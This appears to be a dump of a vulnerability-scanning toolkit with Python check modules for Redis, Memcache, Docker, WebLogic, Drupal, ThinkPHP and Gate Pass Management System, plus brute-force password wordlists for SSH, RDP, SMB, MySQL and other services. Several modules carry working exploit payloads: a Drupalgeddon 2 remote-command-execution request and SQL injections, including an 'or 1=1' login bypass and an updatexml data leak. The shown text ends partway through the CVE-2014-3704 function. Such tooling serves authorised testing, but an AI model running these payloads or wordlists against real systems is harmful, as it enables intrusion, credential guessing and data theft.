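    *URL* may be ``host:port`` or ``scheme://host:port[/]``; the last path
    component is used as the server address.  A trailing slash is now
    stripped first — previously ``http://host:11211/`` yielded an empty
    server string.

    A non-empty ``stats`` reply is printed and reported as unauthenticated
    access; anything else is reported as not found.  Errors are caught
    narrowly (``Exception`` instead of a bare ``except``) and shown rather
    than hidden.

    NOTE(review): python-memcached's ``get_stats()`` appears to skip servers
    it cannot connect to and return an empty list instead of raising, so
    the old "exception == not vulnerable" logic would have printed the
    empty result as a finding for an unreachable host — hence the explicit
    emptiness check below.  Confirm against the installed client version.
    """
    server = URL.rstrip('/').split('/')[-1]
    print('[+]开始检测-memcache未授权访问漏洞。[+]')
    stats = []
    try:
        mc = memcache.Client([server], debug=True)
        stats = mc.get_stats()
    except Exception as e:
        print(f'[-]memcache check failed: {type(e).__name__}: {e}')

    if stats:
        print('[!]memcache获取信息结果:[!]')
        print(stats)
    else:
        print('[-]未发现-发现-memcache未授权访问漏洞。[-]')
    print('[+]检测结束-memcache未授权访问漏洞。[+]')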
17 |
18 |
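if __name__ == "__main__":
    # Stand-alone use takes the target from the command line.  The old
    # guard called attack() with no arguments, which always raised TypeError.
    import sys

    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} HOST:PORT")
    attack(sys.argv[1])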
21 |
--------------------------------------------------------------------------------
/bf_dicts/Microsoft_SQL_Server-passwd.txt:
--------------------------------------------------------------------------------
1 | password
2 | 0
3 | 1
4 | 2
5 | 3
6 | 4
7 | 5
8 | 6
9 | 7
10 | 8
11 | 9
12 | 123
13 | 456
14 | 1234
15 | 123456
16 | 123456
17 | 1212
18 | 12345678
19 | 23456789
20 | 246
21 | 249
22 | 369
23 | 777
24 | 888
25 | 7878
26 | 8787
27 | 8888
28 | 518
29 | 911
30 | 1022
31 | 92072
32 | 111111
33 | 121212
34 | 123123
35 | 123456
36 | Sa
37 | sA
38 | SA
39 | a12345
40 | a1b2c3
41 | a1b2c3d4
42 | fgh@#$
43 | qwe!@#
44 | aaa
45 | aaaaaa
46 | abby
47 | abc
48 | abc123
49 | ABC123
50 | abcd
51 | abcd1234
52 | abcde
53 | Abcdef
54 | abcdef
55 |
--------------------------------------------------------------------------------
/bf_dicts/SNMPpasswd.txt:
--------------------------------------------------------------------------------
1 | admin
2 | cisco
3 | netadmin
4 | private
5 | 1234
6 | root
7 | super
8 | router
9 | public
10 | pento
11 | password
12 | 123456
13 | sysadm
14 | default
15 | switch
16 | backdoor
17 | recovery
18 | secure
19 | anicust
20 | d.e.b.u.g
21 | ADTRAN
22 | installer
23 | surt
24 | NetICs
25 | adminttd
26 | D-Link
27 | tech
28 | private
29 | synnet
30 | adtran
31 | hello
32 | security
33 | guest
34 | smile
35 | support
36 | PASSWORD
37 | changeme2
38 | ascend
39 | netopia
40 | echo
41 | pass
42 | corecess
43 | Manager
44 | secret
45 | BRIDGE
46 | atc123
47 | Password
48 | superuser
49 | 123456
50 | emradmin
51 | 12345678
52 | 123qwe
53 | qwe123
54 | fgh@#$
55 |
--------------------------------------------------------------------------------
/bf_dicts/CISCO-equitment-passwd.txt:
--------------------------------------------------------------------------------
1 | admin
2 | cisco
3 | netadmin
4 | private
5 | 1234
6 | root
7 | super
8 | abc123
9 | router
10 | public
11 | pento
12 | password
13 | 123456
14 | sysadm
15 | default
16 | iloveyou
17 | qq123456
18 | taobao
19 | wang1234
20 | switch
21 | backdoor
22 | recovery
23 | secure
24 | anicust
25 | d.e.b.u.g
26 | ADTRAN
27 | installer
28 | surt
29 | NetICs
30 | adminttd
31 | D-Link
32 | tech
33 | private
34 | synnet
35 | adtran
36 | hello
37 | security
38 | guest
39 | smile
40 | support
41 | PASSWORD
42 | changeme2
43 | ascend
44 | netopia
45 | echo
46 | pass
47 | corecess
48 | Manager
49 | secret
50 | BRIDGE
51 | atc123
52 | Password
53 | superuser
54 | 123456
55 | emradmin
56 | 12345678
57 |
--------------------------------------------------------------------------------
/docker_vuln/docker_daemon_api.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import docker
3 |
4 |
5 | '''
6 | Usage:
7 | moon.py -u docker_vuln http://127.0.0.1:2375
8 | 此漏洞默认存在2375端口上-nmap扫描结果- 2375/tcp open docker
9 | 贴一个漏洞介绍,可能拿shell:https://blog.csdn.net/qq_33020901/article/details/78685447
10 | '''
11 |
12 |
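def attack(URL):
    """Check whether the Docker daemon API at *URL* accepts unauthenticated
    calls.

    Connects with docker-py (``base_url=URL``, typically ``http://host:2375``
    per the module note) and lists the running containers.  Success is
    reported as a finding — an API reachable like this lets anyone on the
    network drive the daemon (the module note says a shell is likely
    obtainable from there).  Any connection or API failure is reported as
    not vulnerable, with the exception shown so timeouts, TLS errors and
    HTTP 403s are distinguishable.

    Changes from the original: a 10 s client timeout (docker-py defaults to
    60 s per call, stalling the scan on a filtered port) and the client is
    closed in ``finally`` so its connection pool is released.
    """
    print('[+]开始检测-Docker-docker_daemon_api未授权访问。[+]')
    client = None
    try:
        client = docker.DockerClient(base_url=URL, timeout=10)
        containers = client.containers.list()

        print('获取到的容器列表:'+str(containers))
        print('[+]存在漏洞,连接成功!!!')
    except Exception as e:
        print('[-]连接失败,漏洞不存在。')
        print(f'    ({type(e).__name__}: {e})')
    finally:
        if client is not None:
            client.close()
    print('[+]检测完成-Docker-docker_daemon_api未授权访问。[+]')
    print('\n')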
24 |
25 |
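if __name__ == "__main__":
    # Stand-alone use takes the daemon URL from the command line.  The old
    # guard called attack() with no arguments, which always raised TypeError.
    import sys

    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} http://HOST:2375")
    attack(sys.argv[1])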
28 |
--------------------------------------------------------------------------------
/bf_dicts/DB2-passwd.txt:
--------------------------------------------------------------------------------
1 |
2 | 123
3 | 123123
4 | 123456
5 | 12345678
6 | !@#
7 | !@#$%^
8 | !@#$%^&*
9 | 111111
10 | 666666
11 | abc
12 | test
13 | 888888
14 | fgh@#$
15 | 123321
16 | |+_)(
17 | Admin123
18 | 88888888
19 | 66666666
20 | test123
21 | master
22 | admin
23 | root
24 | 11111111
25 | 000000
26 | 8888
27 | 6666
28 | 123!@#
29 | 00000000
30 | 1234567
31 | aaaaaa
32 | 654321
33 | 999999
34 | 222222
35 | password
36 | abcdefg
37 | woaini
38 | iloveyou
39 | exit
40 | 99999999
41 | 333333
42 | 444444
43 | 555555
44 | 6543210
45 | 111222
46 | asdfghjkl
47 | abc123
48 | 666888
49 | zzzzzz
50 | abcd1234
51 | 1234
52 | 12345
53 | abcd
54 | abcde
55 | abcdef
56 | abcdefg
57 | abcdefgh
58 | abcdefghi
59 | Admin123
60 | 123qwe
61 | qazwsx
62 | qweasd
63 | asdfjkl;
64 | `1234567890-=
65 | 1234567890-=
66 | !@#$%^&*()_+
67 | ~!@#$%^&*()_+
--------------------------------------------------------------------------------
/bf_dicts/MySQL-passwd.txt:
--------------------------------------------------------------------------------
1 | 123
2 | 123123
3 | 123456
4 | 12345678
5 | !@#
6 | !@#$%^
7 | !@#$%^&*
8 | 111111
9 | 666666
10 | abc
11 | test
12 | 888888
13 | fgh@#$
14 | qwe!@#
15 | 123321
16 | |+_)(
17 | Admin123
18 | 88888888
19 | 66666666
20 | 111111
21 | guest
22 | test123
23 | master
24 | admin
25 | root
26 | 11111111
27 | 000000
28 | 8888
29 | 6666
30 | 123!@#
31 | 00000000
32 | 1234567
33 | aaaaaa
34 | 654321
35 | 999999
36 | 222222
37 | password
38 | abcdefg
39 | woaini
40 | iloveyou
41 | exit
42 | 99999999
43 | 333333
44 | 444444
45 | 555555
46 | 999999
47 | 000000
48 | 00000000
49 | 6543210
50 | 111222
51 | asdfghjkl
52 | abc123
53 | 666888
54 | zzzzzz
55 | abcd1234
56 | Guest123
57 | 1234
58 | 12345
59 | ab
60 | abcd
61 | abcde
62 | abcdef
63 | abcdefg
64 | abcdefgh
65 | abcdefghi
66 | Admin123
67 | 123qwe
68 | qazwsx
69 | qweasd
70 | asdfjkl;
71 | `1234567890-=
72 | 1234567890-=
73 | !@#$%^&*()_+
74 | ~!@#$%^&*()_+
75 |
--------------------------------------------------------------------------------
/bf_dicts/MONGODB-passwd.txt:
--------------------------------------------------------------------------------
1 |
2 | 123
3 | 123123
4 | 123456
5 | 12345678
6 | !@#
7 | !@#$%^
8 | !@#$%^&*
9 | 111111
10 | 666666
11 | abc
12 | test
13 | 888888
14 | 123321
15 | |+_)(
16 | changeMe
17 | Admin123
18 | testpass
19 | 88888888
20 | 66666666
21 | 111111
22 | guest
23 | test123
24 | master
25 | admin
26 | root
27 | 11111111
28 | 000000
29 | 8888
30 | 6666
31 | 123!@#
32 | 00000000
33 | 1234567
34 | aaaaaa
35 | 654321
36 | 999999
37 | 222222
38 | password
39 | abcdefg
40 | woaini
41 | iloveyou
42 | exit
43 | 99999999
44 | 333333
45 | 444444
46 | 555555
47 | 999999
48 | 000000
49 | 00000000
50 | 6543210
51 | 111222
52 | asdfghjkl
53 | abc123
54 | 666888
55 | zzzzzz
56 | abcd1234
57 | Guest123
58 | 1234
59 | 12345
60 | ab
61 | abcd
62 | abcde
63 | abcdef
64 | abcdefg
65 | abcdefgh
66 | abcdefghi
67 | Admin123
68 | 123qwe
69 | qazwsx
70 | qweasd
71 | asdfjkl;
72 | `1234567890-=
73 | 1234567890-=
74 | !@#$%^&*()_+
75 | ~!@#$%^&*()_+
--------------------------------------------------------------------------------
/weblogic/ssrf.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | import requests
4 |
5 | '''
6 | Usage:
7 | moon.py -u weblogic http://127.0.0.1:7001
8 | weblogic version: 10.0.2,10.3.6
9 | 修复:uddiexplorer 删除该目录下的文件,或者做权限配置,禁止对外访问。
10 | 如果可登陆,可在 Setup UDDI Explorer 处获得明确的内网IP
11 | '''
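def attack(URL):
    """Check whether WebLogic's UDDI Explorer — the CVE-2014-4210 SSRF
    surface — is reachable at *URL*.

    Requests ``<URL>/uddiexplorer/`` with a browser User-Agent and reports
    an HTTP 200.  This is a *presence* check, not an SSRF confirmation:
    redirects are followed (requests' default), so a 200 login or landing
    page is reported the same way, and a patched or non-listed version
    (the module note names 10.0.2 and 10.3.6 as affected) is not told
    apart.  Confirm manually before reporting.

    Changes from the original: a 10 s timeout (the call could block
    indefinitely) and ``RequestException`` is caught instead of only
    ``ConnectionError``, so timeouts and malformed URLs print the same
    error line instead of aborting the scan.
    """
    print('[+]开始检测-Weblogic-ssrf-CVE-2014-4210。[+]')

    url = f'{URL}/uddiexplorer/'
    headers = {"Content-Type":'text/xml',
    "User-Agent":'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'}
    try:
        r = requests.get(url, headers=headers, timeout=10)
        if r.status_code == 200:
            print("存在weblogic-ssrf漏洞页面:"+url)
        else:
            print("[-]未发现漏洞页面。")
    except requests.exceptions.RequestException:
        print('[-]访问页面出错!')
    print('[+]检测结束-Weblogic-ssrf-CVE-2014-4210。[+]')
    print('\n')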
28 |
29 |
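if __name__ == "__main__":
    # Stand-alone use takes the target from the command line.  The old
    # guard called attack() with no arguments, which always raised TypeError.
    import sys

    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} http://HOST:7001")
    attack(sys.argv[1])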
32 |
--------------------------------------------------------------------------------
/bf_dicts/POP3-passwd.txt:
--------------------------------------------------------------------------------
1 | 123
2 | 123123
3 | 123456
4 | 12345678
5 | test
6 | xiaoming
7 | !@#
8 | !@#$%^
9 | !@#$%^&*
10 | 111111
11 | 666666
12 | abc
13 | 888888
14 | qq123456
15 | taobao
16 | wang1234
17 | 123321
18 | |+_)(
19 | Admin123
20 | 88888888
21 | 66666666
22 | 111111
23 | guest
24 | test123
25 | master
26 | admin
27 | root
28 | 11111111
29 | 000000
30 | 8888
31 | 6666
32 | 123!@#
33 | 00000000
34 | 1234567
35 | aaaaaa
36 | 654321
37 | 999999
38 | 222222
39 | password
40 | abcdefg
41 | woaini
42 | iloveyou
43 | exit
44 | 99999999
45 | 333333
46 | 444444
47 | 555555
48 | 999999
49 | 000000
50 | 00000000
51 | 6543210
52 | 111222
53 | asdfghjkl
54 | abc123
55 | 666888
56 | zzzzzz
57 | abcd1234
58 | Guest123
59 | 1234
60 | 12345
61 | ab
62 | abcd
63 | abcde
64 | abcdef
65 | abcdefg
66 | abcdefgh
67 | abcdefghi
68 | Admin123
69 | 123qwe
70 | qazwsx
71 | qweasd
72 | asdfjkl;
73 | `1234567890-=
74 | 1234567890-=
75 | !@#$%^&*()_+
76 | ~!@#$%^&*()_+
77 | fgh@#$
78 |
--------------------------------------------------------------------------------
/bf_dicts/SMB-passwd.txt:
--------------------------------------------------------------------------------
1 | 123
2 | 123123
3 | 123456
4 | 12345678
5 | !@#
6 | !@#$%^
7 | !@#$%^&*
8 | 111111
9 | 666666
10 | abc
11 | test
12 | 888888
13 | qwe!@#
14 | xiaoming
15 | qq123456
16 | taobao
17 | wang1234
18 | 123321
19 | |+_)(
20 | Admin123
21 | 88888888
22 | 66666666
23 | 111111
24 | [level=4]
25 | guest
26 | test123
27 | master
28 | admin
29 | root
30 | 11111111
31 | 000000
32 | 8888
33 | 6666
34 | 123!@#
35 | 00000000
36 | 1234567
37 | aaaaaa
38 | 654321
39 | 999999
40 | 222222
41 | password
42 | abcdefg
43 | woaini
44 | iloveyou
45 | exit
46 | 99999999
47 | 333333
48 | 444444
49 | 555555
50 | 999999
51 | 000000
52 | 00000000
53 | 6543210
54 | 111222
55 | asdfghjkl
56 | abc123
57 | 666888
58 | zzzzzz
59 | abcd1234
60 | Guest123
61 | 1234
62 | 12345
63 | ab
64 | abcd
65 | abcde
66 | abcdef
67 | abcdefg
68 | abcdefgh
69 | abcdefghi
70 | Admin123
71 | 123qwe
72 | qazwsx
73 | qweasd
74 | asdfjkl;
75 | `1234567890-=
76 | 1234567890-=
77 | !@#$%^&*()_+
78 | ~!@#$%^&*()_+
79 |
--------------------------------------------------------------------------------
/weblogic/Main_weblogic.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import os
3 | import re
4 | import weblogic.CVE_2019_2725
5 | import weblogic.CVE_2017_10271
6 | import weblogic.ssrf
7 | import weblogic.weblogic_weakpasswd
8 | import weblogic.CNVD_C_2019_48814
9 | import weblogic.CVE_2017_3506
10 | import weblogic.Common_page
11 |
12 |
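def exec(URL):
    """Run every WebLogic check in this package against ``URL``.

    The HTTP checks are plain function calls.  The CVE-2018-2628 check is a
    separate Python 2 script launched through the Windows ``py -2`` launcher,
    so it is run as a subprocess with the host and port parsed from ``URL``.

    Note: the name shadows the ``exec`` builtin; it is kept because the
    per-module ``Main_*`` entry points are called by that name.

    Args:
        URL: Base URL, e.g. ``http://host:7001``.  An explicit port is
            required for the CVE-2018-2628 script.
    """
    import subprocess
    from urllib.parse import urlsplit

    weblogic.Common_page.attack(URL)
    weblogic.CNVD_C_2019_48814.attack(URL)
    weblogic.CVE_2017_10271.attack(URL)
    weblogic.ssrf.attack(URL)
    weblogic.weblogic_weakpasswd.attack(URL)
    weblogic.CVE_2019_2725.attack(URL + '/')
    weblogic.CVE_2017_3506.attack(URL)

    print('[+]开始检测-Weblogic-CVE-2018-2628。[+]')
    # The T3 script sits next to this module: resolve its directory instead
    # of slicing a fixed 38 characters off the absolute path, which only
    # worked for one particular checkout location.
    here = os.path.dirname(os.path.realpath(__file__))
    try:
        parts = urlsplit(URL)
        host, port = parts.hostname, parts.port  # .port raises ValueError if non-numeric
    except ValueError:
        host, port = None, None
    if not host or port is None:
        print('[-]无法从URL解析主机和端口,跳过CVE-2018-2628检测:', URL)
    else:
        try:
            # argv list and no shell: nothing in URL can be read as shell
            # syntax (the old f-string fed to os.system could).  cwd= replaces
            # the process-wide os.chdir().
            subprocess.run(["py", "-2", "CVE_2018_2628.py", host, str(port)], cwd=here)
        except OSError as exc:
            print('[-]无法启动CVE-2018-2628检测脚本(需要 py -2 启动器):', exc)
    print('[+]检测结束-Weblogic-CVE-2018-2628。[+]')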
29 |
30 |
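if __name__ == "__main__":
    import sys

    # exec() takes the target URL; the bare exec() call raised TypeError.
    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} <target-url>")
    exec(sys.argv[1])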
33 |
--------------------------------------------------------------------------------
/bf_dicts/FTP-passwd.txt:
--------------------------------------------------------------------------------
1 | pssword
2 | 123
3 | 123123
4 | 123456
5 | 12345678
6 | test
7 | xiaoming
8 | !@#
9 | !@#$%^
10 | !@#$%^&*
11 | 111111
12 | 666666
13 | abc
14 | 888888
15 | qq123456
16 | qwe!@#
17 | taobao
18 | wang1234
19 | qwe!@#123
20 | 123321
21 | |+_)(
22 | Admin123
23 | 88888888
24 | 66666666
25 | 111111
26 | guest
27 | test123
28 | master
29 | admin
30 | root
31 | 11111111
32 | 000000
33 | 8888
34 | 6666
35 | 123!@#
36 | 00000000
37 | 1234567
38 | aaaaaa
39 | 654321
40 | 999999
41 | 222222
42 | password
43 | abcdefg
44 | woaini
45 | iloveyou
46 | exit
47 | 99999999
48 | 333333
49 | 444444
50 | 555555
51 | 999999
52 | 000000
53 | 00000000
54 | 6543210
55 | 111222
56 | asdfghjkl
57 | abc123
58 | 666888
59 | zzzzzz
60 | abcd1234
61 | Guest123
62 | 1234
63 | 12345
64 | ab
65 | abcd
66 | abcde
67 | abcdef
68 | abcdefg
69 | abcdefgh
70 | abcdefghi
71 | Admin123
72 | 123qwe
73 | qazwsx
74 | qweasd
75 | asdfjkl;
76 | `1234567890-=
77 | 1234567890-=
78 | !@#$%^&*()_+
79 | ~!@#$%^&*()_+
80 |
--------------------------------------------------------------------------------
/bf_dicts/SSH-passwd.txt:
--------------------------------------------------------------------------------
1 | nsfocus123
2 | 123
3 | 123123
4 | 123456
5 | 12345678
6 | !@#
7 | !@#$%^
8 | !@#$%^&*
9 | 111111
10 | 666666
11 | abc
12 | test
13 | 888888
14 | xiaoming
15 | qwe!@#
16 | 123321
17 | |+_)(
18 | qwe!@#123
19 | Admin123
20 | 88888888
21 | 66666666
22 | 111111
23 | guest
24 | test123
25 | master
26 | admin
27 | root
28 | 11111111
29 | 000000
30 | 8888
31 | 6666
32 | 123!@#
33 | 00000000
34 | 1234567
35 | aaaaaa
36 | 654321
37 | 999999
38 | 222222
39 | password
40 | abcdefg
41 | woaini
42 | iloveyou
43 | qq123456
44 | taobao
45 | wang1234
46 | exit
47 | 99999999
48 | 333333
49 | 444444
50 | 555555
51 | 999999
52 | 000000
53 | 00000000
54 | 6543210
55 | 111222
56 | asdfghjkl
57 | abc123
58 | 666888
59 | zzzzzz
60 | abcd1234
61 | Guest123
62 | 1234
63 | 12345
64 | ab
65 | abcd
66 | abcde
67 | abcdef
68 | abcdefg
69 | abcdefgh
70 | abcdefghi
71 | Admin123
72 | 123qwe
73 | qazwsx
74 | qweasd
75 | asdfjkl;
76 | `1234567890-=
77 | 1234567890-=
78 | !@#$%^&*()_+
79 | ~!@#$%^&*()_+
80 |
--------------------------------------------------------------------------------
/redis_vuln/redis_unauthorized.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import redis
3 | import re
4 |
5 | '''
6 | Usage:
7 | moon.py -u redis http://127.0.0.1:6379
8 | redis未授权访问漏洞
9 | '''
10 |
11 |
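def attack(URL):
    """Check whether a Redis instance accepts commands without AUTH.

    ``URL`` may be ``scheme://host:port`` or bare ``host:port``; any scheme
    and trailing slash are ignored.  Unauthenticated access is demonstrated
    by running ``CLIENT LIST``, and the reply is printed.

    Args:
        URL: Target in ``[scheme://]host:port`` form, e.g.
            ``http://127.0.0.1:6379``.

    Returns:
        None.  Findings are printed.
    """
    print('[+]开始检测-Redis未授权访问漏洞。[+]')
    # One parser for both accepted forms: drop an optional "scheme://",
    # then split host and port on the last colon.  This replaces the two
    # regexes whose IndexError fallback also hid a NOAUTH reply from the
    # first attempt (ResponseError was only caught on the retry path).
    target = URL.split('//', 1)[-1].rstrip('/')
    host, sep, port = target.rpartition(':')
    if not sep or not host or not port.isdigit():
        print('[-]目标格式错误,应为 host:port :', URL)
    else:
        try:
            # socket_timeout bounds connect and each command so a filtered
            # port cannot stall the whole scan.
            r = redis.StrictRedis(host=host, port=int(port), db=0, socket_timeout=5)
            print('获取连接成功。客户列表为:' + str(r.client_list()))
        except redis.exceptions.ResponseError:
            # The server answered with an error reply -- typically NOAUTH
            # when requirepass is set.
            print('[-]访问受限:NOAUTH Authentication required')
        except (redis.exceptions.ConnectionError, redis.exceptions.TimeoutError):
            print('获取连接失败。')

    print('[+]检测结束-Redis未授权访问漏洞。[+]')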
29 |
30 |
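if __name__ == "__main__":
    import sys

    # attack() takes the target; the bare attack() call raised TypeError.
    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} <host:port>")
    attack(sys.argv[1])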
33 |
--------------------------------------------------------------------------------
/bf_dicts/RDP-passwd.txt:
--------------------------------------------------------------------------------
1 | 456852ASDwsx.
2 |
3 | 123
4 | 123123
5 | 123456
6 | 12345678
7 | !@#
8 | !@#$%^
9 | !@#$%^&*
10 | 111111
11 | 666666
12 | abc
13 | test
14 | 888888
15 | qwe!@#
16 | xiaoming
17 | qq123456
18 | taobao
19 | wang1234
20 | [level=3]
21 | 123321
22 | 1234
23 | |+_)(
24 | Admin123
25 | 88888888
26 | 66666666
27 | 111111
28 | guest
29 | test123
30 | master
31 | admin
32 | root
33 | 11111111
34 | 000000
35 | 8888
36 | 6666
37 | 123!@#
38 | 00000000
39 | 1234567
40 | aaaaaa
41 | 654321
42 | 999999
43 | 222222
44 | password
45 | abcdefg
46 | woaini
47 | iloveyou
48 | exit
49 | 99999999
50 | 333333
51 | 444444
52 | 555555
53 | 999999
54 | 000000
55 | 00000000
56 | 6543210
57 | 111222
58 | asdfghjkl
59 | abc123
60 | 666888
61 | zzzzzz
62 | abcd1234
63 | Guest123
64 | 1234
65 | 12345
66 | ab
67 | abcd
68 | abcde
69 | abcdef
70 | abcdefg
71 | abcdefgh
72 | abcdefghi
73 | Admin123
74 | 123qwe
75 | qazwsx
76 | qweasd
77 | asdfjkl;
78 | `1234567890-=
79 | 1234567890-=
80 | !@#$%^&*()_+
81 | ~!@#$%^&*()_+
82 |
--------------------------------------------------------------------------------
/durpal/CVE_2018_7600.py:
--------------------------------------------------------------------------------
1 | import sys
2 | import requests
3 | # https://github.com/a2u/CVE-2018-7600/blob/master/exploit.py
4 |
5 | '''
6 | Usage:
7 | moon.py -u drupal http://127.0.0.1:8080
8 | Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600)
9 | '''
10 |
11 |
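def attack(URL):
    """Test for Drupalgeddon 2 (CVE-2018-7600) by writing a marker file.

    The payload abuses the Form API ``#post_render`` callback on the user
    registration form to run ``echo "^w^" | tee hello.txt``; the check then
    fetches ``/hello.txt`` and looks for the marker.  On a vulnerable host
    this leaves ``hello.txt`` in the document root -- remove it after the
    engagement.

    Args:
        URL: Base URL, e.g. ``http://127.0.0.1:8080``.

    Returns:
        None.  Findings are printed.
    """
    print('[+]开始检测-Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600)。[+]')
    url = URL + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
    payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "^w^" | tee hello.txt'}
    try:
        requests.post(url, data=payload, verify=False, timeout=10)
        check = requests.get(URL + '/hello.txt', verify=False, timeout=10)
    except requests.exceptions.RequestException as exc:
        print('[-]请求出错:', type(exc).__name__)
    else:
        # The old code called sys.exit() here.  SystemExit was then caught by
        # the bare except, so a non-vulnerable host printed a generic error
        # instead of a verdict; report and return instead.  Requiring the
        # marker in the body keeps catch-all 200 pages from counting as hits.
        if check.status_code == 200 and '^w^' in check.text:
            print('可能存在漏洞-Check: ' + URL + '/hello.txt ^w^')
        else:
            print('[-]Not exploitable:', URL + '/hello.txt', check.status_code)
    print('[+]检测结束-Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600)。[+]')
    print('\n')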
28 |
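if __name__ == "__main__":
    # attack() takes the target URL; the bare attack() call raised TypeError.
    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} <target-url>")
    attack(sys.argv[1])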
31 |
--------------------------------------------------------------------------------
/gatepass_vuln/Gate_Pass_Management_System_login_SQL_Injection.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | import requests
4 |
5 | '''
6 | Gate Pass Management System 2.1 - 'login' SQL Injection
7 | 发现时间:2018-11-02
8 | 参考:https://www.exploit-db.com/exploits/45766/
9 | moon.py -u gatepass http://xx.xx.xx.xx:xx  (登录界面所在站点的根地址)
10 | '''
11 |
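def attack(URL):
    """Test Gate Pass Management System 2.1 for the login SQL injection.

    Posts the tautology ``'or 1=1 or ''='`` as both username and password to
    ``/login-exec.php`` and classifies the reply by two page markers: the
    application's "check your username and password" error (not vulnerable)
    or the post-login page text 'Industronics Engineering' (bypassed).  Any
    other body is reported as inconclusive.

    Args:
        URL: Site root, e.g. ``http://host:port``.

    Returns:
        None.  Findings are printed.
    """
    print('[+]开始检测-Gate_Pass_Management_System_login_SQL_Injection。[+]')
    url = URL + '/login-exec.php'
    data = {
        'login': r"'or 1=1 or ''='", 'password': r"'or 1=1 or ''='",
        'Submit': 'value',
    }
    try:
        r = requests.post(url, data=data, timeout=10)
    except requests.exceptions.RequestException as exc:
        # Narrowed from a bare except so KeyboardInterrupt still stops the run.
        print('[!]连接端口时发生错误。', type(exc).__name__)
    else:
        if 'Please check your username and password' in r.text:
            print('[-]账户密码错误,绕过登录失败,不存在漏洞。')
            print('检测页面:' + url)
        elif 'Industronics Engineering' in r.text:
            print('[+]绕过登录成功,存在sql注入漏洞。')
            print('漏洞连接:' + url)
            print("利用方法:login='or 1=1 or ''='&password='or 1=1 or ''='&Submit=Login")
        else:
            print('[!]检测时发生错误,可能不存在漏洞页面。')
    print('[+]检测完成-Gate_Pass_Management_System_login_SQL_Injection。[+]')
    print('\n')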
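if __name__ == "__main__":
    import sys

    # attack() takes the target URL; the bare attack() call raised TypeError.
    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} <target-url>")
    attack(sys.argv[1])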
37 |
--------------------------------------------------------------------------------
/thinkphp/thinkphp5_inj_info.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import requests
3 | from bs4 import BeautifulSoup
4 |
5 | '''
6 | moon.py -u thinkphp http://xxxx.xxxx.xxxx.xxxx:xx
7 | ThinkPHP5 SQL注入漏洞 && 敏感信息泄露
8 | 启动后,访问http://your-ip/index.php?ids[]=1&ids[]=2,即可看到用户名被显示了出来。
9 | '''
10 |
11 |
def attack(url):
    """Probe ThinkPHP 5 for the ``ids[]`` SQL injection / information leak.

    Requests ``index.php`` with an array key that carries
    ``updatexml(0, concat(0xa, user()), 0)``.  A vulnerable site answers 500
    with an ``SQLSTATE`` error page whose first ``<h1>`` contains the leaked
    value; that text is printed.  Database connection details are left for
    the operator to read off the page.

    Args:
        url: Base URL, e.g. ``http://host:port`` (no trailing slash).

    Returns:
        None.  Findings are printed.
    """
    print('[+]开始检测 thinkphp5_inj_info !')
    probe = url + '/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1'
    try:
        resp = requests.get(probe, verify=False, timeout=10)
    except Exception:
        print('[-]访问漏洞页面失败,未发现该漏洞!')
        print('\n')
        return

    looks_vulnerable = resp.status_code == 500 and 'SQLSTATE' in resp.text
    if not looks_vulnerable:
        print('[-]访问漏洞页面失败,未发现该漏洞:', probe, resp.status_code)
        print('\n')
        return

    print('[+]存在风险页面,开始检测:', probe)
    try:
        page = BeautifulSoup(resp.content, "lxml")
        print('[+]获得账户数据如下,数据库连接数据请前往页面自行查找:')
        # The error page puts the updatexml() output in its first heading.
        print(page.find_all('h1')[0].get_text())
    except Exception:
        print('[-]获取数据出错!请自行访问页面判断.')
    else:
        print('[+]漏洞检测结束,存在 thinkphp5_inj_info !')
    print('\n')
36 |
37 |
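if __name__ == "__main__":
    import sys

    # attack() takes the target URL; the bare attack() call raised TypeError.
    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} <target-url>")
    attack(sys.argv[1])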
40 |
--------------------------------------------------------------------------------
/durpal/CVE_2014_3704.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | from bs4 import BeautifulSoup
3 | import requests
4 |
5 | '''
6 | Usage:
7 | moon.py -u drupal http://127.0.0.1:8080
8 | Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)
9 | '''
10 |
11 |
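def attack(URL):
    """Test Drupal < 7.32 for "Drupalgeddon" (CVE-2014-3704) SQL injection.

    Posts the login block with an array key in ``name[]`` that breaks out of
    the placeholder expansion and calls ``updatexml(0, concat(0xa, user()), 0)``.
    On a vulnerable MySQL-backed site the database raises an XPATH syntax
    error whose text contains the result of ``user()`` (``user@host``), and
    Drupal echoes that error on the page.  Other database backends will not
    produce this message and are reported as "not found".

    Args:
        URL: Base URL, e.g. ``http://127.0.0.1:8080``.

    Returns:
        None.  Findings are printed.
    """
    import html
    import re

    url = URL + '/?q=node&destination=node'
    print('[+]开始检测-Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)。[+]')

    user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
    Content_Type = "application/x-www-form-urlencoded"
    headers = {"User-Agent": user_agent, "Content-Type": Content_Type}

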